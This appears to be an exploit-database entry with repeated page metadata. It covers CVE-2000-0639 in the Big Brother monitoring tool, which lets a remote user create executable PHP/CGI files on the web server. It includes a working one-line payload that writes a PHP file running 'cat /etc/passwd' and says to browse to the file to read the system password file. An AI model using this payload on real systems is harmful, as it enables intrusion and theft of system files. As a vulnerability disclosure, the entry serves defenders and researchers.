Sean MacGuire Big Brother 1.0/1.3/1.4 - CGI File Creation
| EKU-ID: 25666 | CVE: CVE-2000-0639;OSVDB-1472 | OSVDB-ID: |
| Author: xternal | Published: 2001-06-11 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 25666 | CVE: CVE-2000-0639;OSVDB-1472 | OSVDB-ID: |
| Author: xternal | Published: 2001-06-11 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
source: https://www.securityfocus.com/bid/1494/info A vulnerability in Big Brother exists which would allow a user to remotely create CGI scripts which could be requested from the Web Server. These could be used to read files and possibly execute commands on the web server machine. ./bb 1.2.3.4 "status evil.php3 <?<system(\"cat /etc/passwd\");?>" will allow viewing of the /etc/passwd upon browsing to http://1.2.3.4/bb/logs/evil.php3.